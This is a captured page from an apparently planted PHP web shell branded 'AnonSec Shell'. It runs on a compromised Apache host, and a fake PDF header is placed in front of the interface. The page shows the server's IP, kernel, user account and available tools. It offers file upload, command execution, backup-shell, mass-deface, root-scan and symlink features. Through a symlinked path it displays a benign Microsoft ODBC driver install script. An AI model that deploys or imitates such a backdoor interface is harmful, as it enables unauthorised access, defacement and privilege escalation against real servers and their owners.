%PDF-1.4 %Óëéá 1 0 obj <> endobj 3 0 obj <> endobj 4 0 obj < AnonSec Shell
AnonSec Shell
Server IP : 212.252.79.165  /  Your IP : 216.73.217.172   [ Reverse IP ]
Web Server : Apache
System : Linux 212-252-79-165.cprapid.com 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
User : cehaburo ( 1001)
PHP Version : 8.1.33
Disable Function : exec,passthru,shell_exec,system
Domains : 48 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/cehaburo/public_html/images/product/anon_sym/anon/var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/cehaburo/public_html/images/product/anon_sym/anon/var/lib/dpkg/info/msodbcsql18.preinst
#!/bin/bash -e

. /usr/share/debconf/confmodule

check_eula_acceptance()
{
    db_get msodbcsql/ACCEPT_EULA

    if [ ! -f "/opt/microsoft/msodbcsql18/ACCEPT_EULA" ] && [ "$RET" != "true" ] && [ "$ACCEPT_EULA" != "y" ] && [ "$ACCEPT_EULA" != "Y" ]; then
        db_set msodbcsql/accept_eula false
        db_fset msodbcsql/accept_eula seen false
        db_input high msodbcsql/accept_eula	|| true
        db_go

        db_get msodbcsql/accept_eula

        if [ "$RET" != "true" ]; then
            echo "ERROR: The EULA was not accepted. Installation aborted." >&2
            exit 1
        fi
    fi
    db_set msodbcsql/accept_eula true
}

# check if Driver is installed 
check_driver()
{
    exit_code=0
    odbcinst -q -d -n "ODBC Driver $1 for SQL Server" &>/dev/null || exit_code=$?
    if (( exit_code == 0 )) ; then
        # Driver found, abort the installation
        echo "Installation failed, ODBC Driver $1 for SQL Server detected!" >&2
        exit 1
    fi
}

case "$1" in
    install)
        # check if Driver 18 is installed 
        check_driver 18

        check_eula_acceptance
    ;;

    upgrade)
        check_eula_acceptance
    ;;

    abort-upgrade)
    ;;

    *)
        echo "preinst called with an unknown argument '$1'" >&2
        exit 1
esac

exit 0

Anon7 - 2022
AnonSec Team